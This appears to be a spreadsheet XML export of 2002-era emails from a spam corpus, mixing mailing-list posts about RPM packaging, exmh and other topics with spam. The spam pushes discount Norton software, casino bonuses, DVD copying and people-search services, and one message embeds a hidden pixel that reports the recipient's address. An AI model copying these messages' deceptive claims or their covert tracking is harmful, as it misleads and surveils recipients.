 &lt;body&gt;
 &lt;table border=3D"3" cellspacing=3D"3" width=3D"469" cellpadding=3D"3" bgco=
 lor=3D"#000080"  bordercolor=3D"#FFFFFF" style=3D"border-collapse: collaps=
 e" bordercolordark=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"447"&gt;&amp;nbsp;
       &lt;table border=3D"1" width=3D"100%" bgcolor=3D"#FFFFFF" bordercolor=3D=
 "#000080"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" align=3D"center"&gt;&lt;font face=3D"Impact" size=3D=
 "4" color=3D"#CC0000"&gt;ATTENTION:
             This is a MUST for &lt;u&gt;ALL&lt;/u&gt; Computer Users!!!&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"center"&gt;&lt;font size=3D"3" face=3D"Verdana"&gt;&lt;b&gt;&amp;nbsp;&lt;font=
  color=3D"#FFFFFF"&gt;*NEW
       - Special Package Deal!*&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;table border=3D"8" width=3D"100%" height=3D"86" bgcolor=3D"#FFFFFF"=
  bordercolor=3D"#FFFF00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"80" align=3D"center"&gt;&lt;font face=3D"=
 Verdana, Arial, Helvetica, sans-serif" color=3D"#000099" size=3D"5"&gt;&lt;b&gt;Nor=
 ton
             SystemWorks 2002 Software Suite&lt;br&gt;
             -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"62"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"56" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;Includes
             Six - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F00"&gt;Yes 6!&lt;/font&gt;&lt;/i&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt; =
 - Feature-Packed Utilities&lt;br&gt;ALL
             for &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF00"&gt;=
 1&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Special &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF=
 00"&gt;LOW&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Price!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"115" bgcolor=3D"#000080=
 " bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"109"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D=
 "2" color=3D"#FFFF00"&gt;This Software Will:&lt;/font&gt;&lt;font face=3D"Tahoma" size=
 =3D"2" color=3D"#FFFFFF"&gt;&lt;br&gt;- Protect your
             computer from unwanted and &lt;i&gt; hazardous&lt;/i&gt; viruses&lt;br&gt;- Help=
  secure your
             private &amp;amp; valuable information&lt;br&gt;- Allow you to transfer =
 files
             and send e-mails &lt;u&gt; safely&lt;/u&gt;&lt;br&gt;- Backup your ALL your data=
  quick and
             easily&lt;br&gt;- Improve your PC's performance w/&lt;i&gt;superior&lt;/i&gt;
             integral diagnostics!&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&amp;nbsp;
       &lt;table border=3D"4" width=3D"100%" height=3D"4" bgcolor=3D"#FFFFFF" =
 bordercolor=3D"#FFFF00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"1"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"5"&gt;&lt;font=
  color=3D"#000000"&gt;&lt;font color=3D"#ff0000"&gt;6&lt;/font&gt;
             &lt;/font&gt;&lt;font color=3D"#000080"&gt;Feature-Packed Utilities&lt;br&gt;&lt;/f=
 ont&gt;&lt;font color=3D"#000000"&gt;
             &lt;/font&gt;&lt;u&gt;&lt;font color=3D"#ff0000"&gt;1&lt;/font&gt;&lt;/u&gt;&lt;u&gt;&lt;font color=3D=
 "#000000"&gt; 
             &lt;/font&gt;&lt;font color=3D"#000080"&gt; Great
             Price&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000000"&gt; &lt;br&gt;
             &lt;/font&gt;&lt;font color=3D"#000080"&gt;
             A&lt;/font&gt;&lt;font color=3D"#000000"&gt; &lt;font color=3D"#ff0000"&gt;$300+=
 &lt;/font&gt;  &lt;/font&gt;&lt;font color=3D"#000080"&gt; Combined Retail Value
             &lt;i&gt;YOURS&lt;/i&gt; for Only&lt;/font&gt;&lt;font color=3D"#000000"&gt; &lt;font col=
 or=3D"#ff0000"&gt;$29.99!&lt;/font&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"4"&gt;&lt;font color=3D=
 "#000080"&gt;&amp;lt;Includes
             &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;&lt;font color=3D"#0000=
 80"&gt; Shipping!&amp;gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p align=3D"Center"&gt;&lt;b&gt; &lt;font face=3D"Arial, Helvetica, sans-serif"  c=
 olor=3D"#ffffff"&gt;Don't fall prey to destructive viruses
     or hackers!&lt;br&gt;Protect&amp;nbsp; your computer and your valuable  informat=
 ion
     and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;table border=3D"1" width=3D"100%" height=3D"44" bordercolor=3D"#FFF=
 FFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"38" bgcolor=3D"#0000FF" align=3D"ce=
 nter"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"4" color=3D"#FFFFFF"&gt;&lt;a href=3D"ht=
 tp://www.deal2002.com/systemworks.htm" style=3D"color: #FFFFFF; font-famil=
 y: Verdana; font-size: 14pt; font-weight: bold"&gt;-&amp;gt;
             CLICK HERE to Order Yours NOW! &amp;lt;-&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"Center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"5"&gt;&lt;a style=3D"t=
 ext-decoration: none; background-color: rgb(255,255,0); color: #0000FF" hr=
 ef=3D"http://www.deal2002.com/systemworks.htm"&gt;Click
       here for more information&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"Center"&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#fffff=
 f"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
       &lt;/font&gt;&lt;p align=3D"Center"&gt;&lt;font color=3D"#ffffff" size=3D"1" face=3D=
 "Tahoma"&gt;Your
       email address was obtained from an opt-in list. Opt-in MRSA List&lt;br&gt;
       &amp;nbsp;Purchase Code # 312-1-010.&amp;nbsp;&amp;nbsp;If you wish to be unsubs=
 cribed
       from this list, please &lt;a style=3D"COLOR: #ffffcc" href=3D"mailto:re=
 moveme@btamail.net.cn?Subject=3DUnsubcribe Immediately"&gt;Click
       here&lt;/a&gt; and press send to be removed. If you have previously unsubs=
 cribed
       and are still receiving this message, you may email our &lt;a style=3D"=
 COLOR: #ffffcc" href=3D"mailto:sortofridiculous@bigfoot.com?Subject=3DAbus=
 e Report"&gt;Spam
       Abuse Control Center&lt;/a&gt;. We do not condone spam in any shape or for=
 m.
       Thank You kindly for your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: sylpheed-claws
</t>
  </si>
  <si>
    <t xml:space="preserve">Have you thought of bumping up sylpheed-claws?  I see sylpheed got a
 bump... show some claws love?  (;
 -- 
 Jesse Keating
 j2Solutions.net
 Mondo DevTeam (www.mondorescue.org)
 Was I helpful?  Let others know:
  http://svcs.affero.net/rm.php?r=jkeating
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Roman chariots responsible for Space Shuttle design constraints
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485894
 Date: Not supplied
 Ben Hammersley posts a parable about design specifications, showing the link 
 between Roman Chariots and the Space Shuttle. It has the ring of something 
 apocraphyl to me, but it's a good read, nevertheless. 
     The U.S. standard railroad gauge (distance between the rails) is 4 feet, 
     8.5 inches. That is an exceedingly odd number. Why was that gauge used? 
     Because that's the way they built them in England, and the U.S. railroads 
     were built by English expatriates. 
     Why did the English build them that way? Because the first rail lines were 
     built by the same people who built the pre-railroad tramways, and that's 
     the gauge they used. 
     Why did "they" use that gauge? Because the people who built the tramways 
     used the same jigs and tools that they used for building wagons, which used 
     that wheel spacing. 
     So why did the wagons have that particular odd spacing? Well, if they tried 
     to use any other spacing, the wagon wheels would break on some of the old, 
     long distance roads in England, because that was the spacing of the wheel 
     ruts... 
 Snopes says it's false[1], but from their notes, it appears that it's actually 
 largely true, albeit subject to interpretation. Link[2] Discuss[3]
 [1] http://www.snopes.com/history/american/gauge.htm
 [2] http://www.benhammersley.com/archives/001404.html#001404
 [3] http://www.quicktopic.com/boing/H/ibHLzVeWnweZ
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your $1365 Welcome Bonus is waiting for You!! 
</t>
  </si>
  <si>
    <t xml:space="preserve">This is NOT spam.=20
 Your email is listed as a member of topdollaremaillings.
 This is a opt-in service. To be removed see below
 --------------------------------------------------
 To receive 1365$ free is so easy,you only to do is to download and instal=
 l the software,then
 open a real Account
 Get up to $100 Free when you download,install the software  and open a Re=
 al Account=20
 http://www.aceshigh.com/index.asp?s=3Daff76733
 Get up to $110 Free when you download,install the software  and open a Re=
 al Account=20
 http://www.capitalcasino.com/index.asp?s=3Daff76733
 Get up to $115 Free when you download,install the software  and open a Re=
 al Account
 http://www.flashvegas.com/index.asp?s=3Daff76733
 Get up to $150 Free when you download,install the software  and open a Re=
 al Account
 http://www.gamingclub.com/index.asp?s=3Daff76733
 Get up to $50 Free when you download,install the software  and open a Rea=
 l Account
 http://www.homecasino.com/index.asp?s=3Daff76733
 BUY $50 AND GET AN EXTRA $50 FREE!you only to do is download,install the =
 software  and open a Real Account
 http://www.jackpotcity.com/index.asp?s=3Daff76733
 Get $10 free,no purchase required,and $100 free when you purchase $100
 http://www.luckynugget.com/index.asp?s=3Daff76733
 purchase $100 and get $110 FREE, When you purchase with Paypal
 http://www.orbitalcasino.com/index.asp?s=3Daff76733
 $115 Sign on Bonus for you=20
 http://www.riverbelle.com/index.asp?s=3Daff76733
 $75 Sign on Bonus for you=20
 http://www.showdowncasino.com/index.asp?s=3Daff76733
 $200 Sign on Bonus for you
 http://www.gamblingfederation.com/~96797x4A/S1/indexsc.php#
 Get $10 free,no purchase required and $50 free bonus when you first purch=
 ase=20
 http://www.quicksilvercasino.com/aiddownload.asp?affid=3D1034
 The above is non paid email
 --------------------------------------------------
 To be removed from future mailings please unsubscribe at
 www.topdollaremaillings.com. Click on Members, then User Account Info,
 scroll down to the bottom of the page. You will LOSE all referrals
 and money owed to you.
 ---------------------------------------------------------------
    =B1=BE=D3=CA=BC=FE=D3=C9=CB=D1=D2=D7=CA=D7=B4=B4=A1=B0=CE=DE=D0=E8SMTP=
 =C8=BA=B7=A2=C6=F7=A1=B1=B7=A2=CB=CD=A3=AC=C4=DA=C8=DD=D3=EB=B1=BE=B9=AB=CB=
 =BE=CE=DE=B9=D8=A1=A3
    =D7=EE=BC=D1=C8=BA=B7=A2=D6=CA=C1=BF=A3=BA=C6=D5=CD=A8PC=D6=D5=B6=CB=D7=
 =D4=BD=A8SMTP=A3=AC=B6=D4=C3=BF=B8=F6=D3=CA=D6=B7=CC=D8=BF=EC=D7=A8=B5=DD=
 =B7=A2=CB=CD=A1=A3
    =D7=EE=BC=D1=C8=BA=B7=A2=CB=D9=B6=C8=A3=BA=B6=E0=CF=DF=B3=CC=CD=AC=B2=BD=
 =B8=DF=CB=D9=B7=A2=CB=CD=A3=AC=B2=BB=B4=E6=D4=DA=D3=CA=BC=FE=B4=AB=CA=E4=D1=
 =D3=B3=D9=CF=D6=CF=F3=A1=A3
    =D7=EE=BC=D1=C8=BA=B7=A2=D0=A7=B9=FB=A3=BA=CD=BB=C6=C6=D2=BB=C7=D0=B7=FE=
 =CE=F1=C6=F7=B9=FD=C2=CB=A3=AC=B2=BB=D4=D9=B5=A3=D0=C4=B7=A2=B3=F6=D3=CA=BC=
 =FE=BB=E1=B6=AA=CA=A7=A1=A3
    =D2=BB=C1=F7=C9=CC=CE=F1=C8=ED=BC=FE=D5=BE=B5=E3      http://www.seeke=
 asysoft.net
 ---------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">On 07 September 2002, Guido van Rossum said:
 &gt; If and when we package this, perhaps we should use Barry's trick
 &gt; from the email package for making the package itself the toplevel dir
 &gt; of the distribution (rather than requiring an extra directory level
 &gt; just so the package can be a subdir of the distro).
 It's not a *trick*!  It just requires this
   package_dir = {'spambayes': '.'}
 in the setup script.
 harrumph!  "trick" indeed...
         Greg
 -- 
 Greg Ward &lt;gward@python.net&gt;                         http://www.gerg.ca/
 A committee is a life form with six or more legs and no brain.
</t>
  </si>
  <si>
    <t xml:space="preserve">--------------103237257898946
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 Friend,Now you can copy DVD's and Games
 http://www.terra.es/personal9/bigmac241/
 BACKUP DVD VIDEO's WITH YOUR CD-R BURNER
 With 321 studio's software, you can now copy
 any DVD and Playstation Game.  Never buy another 
 backup DVD movie again.  Just copy it!
 This is the first time this software is being made
 available to the public. All the software you need 
 to burn your own DVD Video, is included in 321 Studio's 
 software package DVD Copy Plus!  The movies will play 
 in a standard DVD player. With detailed, easy to follow, 
 step-by-step instructions, you can BURN your own DVD 
 Video using nothing more than your DVD-ROM 
 and CD-R drives. Purchase a copy! Click below.
 http://www.terra.es/personal9/bigmac241/
 Order today and receive!
 *Step by Step Interactive Instructions
 *All Software Tools Included On CD
 *No DVD Burner Required
 *FREE Live Technical Support
 *30 Day Risk Free Trial Available
 With DVD Copy Plus you can backup Your DVD Movies with 
 the same 74min or 80min CD-R's you've used in the past 
 to create audio CD's. Our software compresses the large 
 DVD files on your standard DVD to VCD, SVCD, and DivX 
 much the same way the popular MP3 format compresses audio.  
 Order today and start burning
 http://www.terra.es/personal9/bigmac241/
 Thank You,
 CopymyDVD
 http://inglesa.net/unsub.php?client=atomicDOT
 We take your privacy very seriously and it is our policy never to send
 unwanted email messages. This message has been sent to zzzz@example.com
 because you originally joined one of our member sites or you signed up
 with a party that has contracted with atomicDOT. Please
 http://tilw.net/unsub.php?client=atomicDOT&amp;msgid=18090200013
 to Unsubscribe (replying to this email WILL NOT unsubscribe you). 
 TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8;
 --------------103237257898946
 Content-Type: text/html; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Backup your DVD's&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;META content="MSHTML 6.00.2600.0" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;body&gt;&lt;DIV&gt;&lt;/DIV&gt;
 &lt;BLOCKQUOTE 
 style="PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"&gt;
   &lt;DIV&gt;&lt;/DIV&gt;
   &lt;TABLE cellSpacing=0 cellPadding=0 width=525 align=center bgColor=#ffffff 
   border=0&gt;
     &lt;TBODY&gt; 
     &lt;TR&gt; 
       &lt;TD width="33"&gt;&lt;IMG height=1 src="images/spacer.gif" width=33 border=0&gt;&lt;/TD&gt;
       &lt;TD width="174"&gt;&lt;IMG height=1 src="images/spacer.gif" width=174 border=0&gt;&lt;/TD&gt;
       &lt;TD width="360"&gt;&lt;IMG height=1 src="images/spacer.gif" width=360 border=0&gt;&lt;/TD&gt;
       &lt;TD width="33"&gt;&lt;IMG height=1 src="images/spacer.gif" width=33 border=0&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD colSpan=4&gt;&lt;a href="http://www.terra.es/personal9/bigmac241/"&gt;&lt;IMG height=253 src="http://www.terra.es/personal9/bigmac241/images/mailer8_r1_c1.gif" 
         width=600 useMap=#Map border=0&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD background=http://www.terra.es/personal9/bigmac241/images/mailer8_r2_c1.gif height=181&gt;&amp;nbsp;&lt;/TD&gt;
       &lt;TD vAlign=top align=left colSpan=2 height=181&gt; 
         &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;With DVDCopyPlus 
           and PowerCDR5.0 you can copy and burn your&lt;/FONT&gt;&lt;/P&gt;
         &lt;UL&gt;
           &lt;LI&gt;                      &lt;img src="http://www.terra.es/personal9/bigmac241/images/INSTANTLY-DOWNLOAD.gif" alt="" height="36" width="288" border="0"&gt;
 							&lt;li&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;DVD Movies&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;
 							&lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Playstation &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;MP3s, AVIs and all 
             other multimedia Files&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; 
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Software, Music 
             CDs (perfect RAW data duplication)&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt; 
           &lt;LI&gt;&lt;FONT color=#003399&gt;&lt;B&gt;&lt;FONT 
           face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;NEW! Burn to CD-R 
             or DVD-R&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;
         &lt;/UL&gt;
         &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Protect your 
           investments by backing up your CD, DVD, MP3, Data and Game collections 
           with burned copies that really work! Separately, DVDCopyPlus and PowerCDR5.0 
           are over $100 worth of software that you can purchase bundled right 
           now for just $49.99!&lt;/FONT&gt;&lt;/P&gt;
         &lt;P align=center&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
         size=2&gt;&lt;B&gt;&lt;FONT size=5&gt;THAT'S 50% OFF!&lt;BR&gt;
           &lt;/FONT&gt;&lt;A 
         href="http://www.terra.es/personal9/bigmac241/"&gt;MORE DETAILS&lt;/A&gt; &lt;A 
         href="http://www.terra.es/personal9/bigmac241/"&gt;ORDER NOW&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;/TD&gt;
       &lt;TD background=http://www.terra.es/personal9/bigmac241/images/mailer8_r2_c4.gif height=181&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD colSpan=4&gt;&lt;IMG height=24 src="http://www.terra.es/personal9/bigmac241/images/mailer8_r3_c1.gif" 
         width=600 border=0 name=mailer8_r3_c1&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD height="18"&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;/TBODY&gt; 
   &lt;/TABLE&gt;
   &lt;MAP name=Map&gt;&lt;AREA shape=POLY 
     coords=244,119,270,129,280,114,297,125,318,113,327,129,355,120,352,133,385,131,381,140,398,145,398,152,405,151,397,160,383,165,409,172,381,180,404,193,384,195,382,207,384,212,364,210,351,213,353,224,327,216,317,230,297,219,278,232,269,218,243,225,238,210,211,210,209,202,199,193,216,180,186,172,216,164,192,151,195,143,211,136,211,132,231,135,243,130,243,121 
     href="http://www.terra.es/personal9/bigmac241/"&gt;&lt;/MAP&gt;&lt;FONT 
   face=Verdana,Geneva,Arial,Helvetica,sans-serif color=#000000 size=1&gt;
   &lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;/FONT&gt;&lt;/BLOCKQUOTE&gt;&lt;/BODY&gt;&lt;/body&gt;&lt;/HTML&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p&gt;&lt;font size="1" face="Arial"&gt;We take your privacy very seriously and it is our policy never to send unwanted email messages.  This message has been sent to zzzz@example.com because you originally joined one of our member sites or you signed up with a party that has contracted with atomicDOT.  Please &lt;a href="http://tilw.net/unsub.php?client=atomicDOT&amp;msgid=18090200013" TARGET="_blank"&gt;Click Here&lt;/a&gt;&lt;/font&gt; to Unsubscribe  &lt;font size="1" face="Arial"&gt;(replying to this email WILL NOT unsubscribe you).  &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;&gt;
 &lt;/body&gt;&lt;/html&gt;&lt;br&gt;&lt;br&gt;
 &lt;img src="http://tilw.net/counter.php?client=atomicDOT&amp;email=zzzz@example.com&amp;msgid=18090200013" width="1" height="1" border="0" alt=""&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size="-5"&gt;TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8;&lt;/font&gt;
 --------------103237257898946--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --RnlQjJ0d97Da+TV1
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 On Wed, Oct 02, 2002 at 10:09:19AM +0200, Matthias Saou wrote:
 &gt; Well, I don't really find it consistent at all to use an rpm package built
 &gt; against something that wasn't installed through rpm :-/
 Following that reasoning, I've been installing all my custom-built
 kernels through rpm recently. I find it annoying, though, that 
 alsa-kernel, and similar packages, will only build for the currently 
 running kernel.
 So I've attached a patch to specify an alternate kernel by setting the
 "TARGET_KERNEL" environment variable before running rpmbuild. You
 still need to have the rpm for the specified kernel installed, but at
 least it doesn't have to be currently running. It's kinda hackish, so
 if someone has a better way to do this, let me know.
 gary
 --RnlQjJ0d97Da+TV1
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline; filename="alsa-driver-spec.patch"
 --- alsa-driver.spec.orig	2002-10-02 12:25:26.000000000 -0700
 +++ alsa-driver.spec	2002-10-01 21:23:19.000000000 -0700
 @@ -3,9 +3,12 @@
  # Comma separated list of cards for which to compile a driver
  %define	cards		all
 -%define	kunamer		%(uname -r)
 -%define	kversion	%(echo $(uname -r) | sed -e s/smp// -)
 -%if %(uname -r | grep -c smp)
 +%if %(printenv TARGET_KERNEL &gt;/dev/null &amp;&amp; echo -n 1 || echo -n 0)
 +%define usekernel	%(echo -n $TARGET_KERNEL)
 +%endif
 +%define	kunamer		%{!?usekernel: %(uname -r)}%{?usekernel}
 +%define	kversion	%(echo %{kunamer} | sed -e s/smp// -)
 +%if %(echo %{kunamer} | grep -c smp)
  	%{expand:%%define ksmp -smp}
  %endif
  %define	karch		%(rpm -q --qf '%%{arch}' kernel%{?ksmp}-%{kversion})
 @@ -77,6 +80,7 @@
  	%{?_without_isapnp:--with-isapnp=no} \
  	%{?_without_sequencer:--with-sequencer=no} \
  	%{?_without_oss:--with-oss=no} \
 +	%{?usekernel:--with-kernel=/lib/modules/%{usekernel}/build} \
  	--with-cards=%{cards}
  make
 @@ -106,10 +109,10 @@
  rm -f %{buildroot}/etc/rc.d/init.d/alsasound
  %post -n alsa-kernel%{?ksmp}
 -/sbin/depmod -a
 +/sbin/depmod -a -F /boot/System.map-%{kunamer} %{kunamer}
  %postun -n alsa-kernel%{?ksmp}
 -/sbin/depmod -a
 +/sbin/depmod -a -F /boot/System.map-%{kunamer} %{kunamer}
  %clean
  rm -rf %{buildroot}
 --RnlQjJ0d97Da+TV1--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Tue, 27 Aug 2002 18:08:12 -0700
     From:        Brent Welch &lt;welch@panasas.com&gt;
     Message-ID:  &lt;200208280108.VAA30178@blackcomb.panasas.com&gt;
   | If we are allowed to assume 8.2 or higher, which we can't really, then
   | we could add
 [...]
   | to the SelectTypein procedure.
 Yes, I looked at "fixing" it there, but that code is really quite
 general, with almost no understanding of what anything means, so I
 didn't think that corrupting it with knowlwedge of the semantics of
 what it is fetching would really be the best thing to do.
 I ran out of time last night while looking for a better place for
 a similar check (I would have gone directly to the regexp - I'm not
 that up to date with all the latest tcl changes...) and I'm not sure
 I will have time today, but I will keep looking.
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Colm,
 -----------
 &gt;You're going to get Significant Frowns from your average cat breeder
 &gt;if you say you want a cat who looks like a Pokmon.
 -----------
 ;-) Yep I know, but wee Daisy really loves Pokemon but she loves "persians"
 equally, actually any cat really, its really me that wants the pokemon style
 cat ;)
 -----------------
 &gt;Why is that Pokmon called "Persian", anyway - it looks nothing like a
 &gt;Persian cat?  It does look like a Siamese or (more likely)
 &gt;Abyssinian.  If you want one of these breeds, I hope you're prepared
 &gt;to part with BIGNUM; they're not cheap.
 ---------
 Yep 450 yoyo's for a wee one, thats a lot of fish food. And I might not even
 get one in the Republic. An Abssynian you say looks like the pokemon
 Persian? That would qualify nicely.
 Thanks for the advice ladies, I now have TWO options. At least I still have
 till Haloween before Daisy turns 5. D-Day. 
 Regards
 CW
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 27 Aug 2002, Rohit Khare wrote:
 &gt; DATAPOWER TECHNOLOGY ON Monday unveiled its network device designed
 &gt; specifically to process XML data. Unlike competing solutions that
 &gt; process XML data in software, DataPower's device processes the data in
 &gt; hardware -- a technology achievement that provides greater performance,
 &gt; according to company officials.
 Now, to do this, we all know they have to be cracking the strong crypto used
 on all transaction in order to process them... So this has some preaty heavy
 implications, unless it's just BS.
 &gt; Kelly explained that converting data into XML increases the file size up
 &gt; to 20 times. This, he said, makes processing the data very taxing on
 &gt; application servers; DataPower believes an inline device is the best
 &gt; alternative.
 Or.... you could just not bloat it 20x to begin with. Nah! (that was the
 whole point of XML afterall, to sell more CPUs - much like Oracle's use of
 Java allows them to sell 3x more CPU licenses due to the performance hit)
 &gt; In addition to the large file sizes, security is also of paramount
 &gt; importance in the world of XML.
 &gt;
 &gt; "Today's firewalls are designed to inspect HTTP traffic only," Kelly
 &gt; said. "A SOAP packet with XML will go straight through a firewall.
 &gt; Firewalls are blind to XML today."
 Again, see above... they _are_ claiming to decode the crypto...
 &gt; "Our XG3 execution core converts XML to machine code," said Kelly,
 Mmmmmmmmmmm, machine code, never a good idea ;)
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;                                                                   In the
 &gt; Philippines, getting legal title can take 20 years.  In Egypt, about 80%
 &gt; of the population in Cairo lives in places where they are officially
 &gt; illegal.
 If the situation in Egypt is anything
 like the situation in the Philippines,
 it's because people (due to a strange
 desire for jobs) squat on land which
 they don't own.*
 For people to be able to buy their own
 land, capitalism must be healthy, but
 not triumphant; there need to be too
 many capitalists, not too few.
 (how well off were the major landowners
 in india before independence?)
 -Dave
 * In the US, we are not so friendly to
 our capitalists: adverse possession is
 only supposed to take 5 years.
 (How much do we owe to our frontiers?
 Heck, in Egypt didn't they pretty much
 invent geometry a few millenia ago to
 keep track of their property lines?)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: pmgeiser@datacomm.ch
</t>
  </si>
  <si>
    <t xml:space="preserve">
 READY TO KNOW?
 &gt; 
 &gt; CONFIDENTIAL
 &gt; 
 &gt; The SOFTWARE They Want BANNED In all 50 STATES.
 &gt; Why? Because these secrets were never intended to reach your eyes...
 &gt; Get the facts on anyone!    
 &gt; 
 &gt; Locate Missing Persons, find Lost Relatives, obtain Addresses
 &gt; and Phone Numbers of old school friends, even Skip Trace Dead 
 &gt; Beat Spouses. This is not a Private Investigator, but all
